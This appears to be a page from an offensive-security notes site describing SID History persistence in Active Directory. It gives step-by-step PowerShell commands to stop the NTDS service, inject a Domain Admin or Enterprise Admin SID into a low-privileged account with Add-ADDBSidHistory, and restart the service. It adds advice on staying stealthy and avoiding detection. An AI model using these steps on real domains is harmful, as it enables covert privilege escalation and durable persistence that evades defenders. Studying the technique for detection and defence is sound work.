SID history

By manipulating the SID History attribute, you can grant elevated privileges (e.g., Domain Admin or Enterprise Admin) to a low-privileged account without modifying its group memberships.

Key Points:
- Requires Domain Admin privileges or equivalent.
- SIDs in the token determine effective privileges, regardless of group membership.
- Using Enterprise Admin SIDs can extend privileges across the forest.
- Persistence can be stealthy by altering the SID history of secondary accounts.

Steps to Execute SID History Persistence

Step 1: Check SID History

Verify the current SID History and group memberships of an account:

Get-ADUser <your ad username> -properties sidhistory,memberof

Step 2: Identify Domain SID

Retrieve the domain SID:

Get-ADGroup "Domain Admins"

Step 3: Forge SID History

Stop the Active Directory Domain Services (NTDS) service:
```
Stop-Service -Name ntds -force
```
Modify the SID History attribute of a low-privileged account:
```
Add-ADDBSidHistory -SamAccountName '<username>' -SidHistory '<SID to add>'
```
Replace <username> with the low-privileged account and <SID to add> with the desired SID (e.g., Domain Admin SID).
Restart the NTDS service:
```
Start-Service -Name ntds
```

Step 4: Verify Elevated Privileges

The modified account will now effectively have Domain Admin access, even if it remains a simple Domain Users account.

Key Notes

Be cautious about detection: Modify SID History indirectly via a secondary account for added stealth.
SIDs persist in user tokens during logon, making this a durable form of persistence.

PreviousPersistence NextPersistence on the Domain

Last updated 3 months ago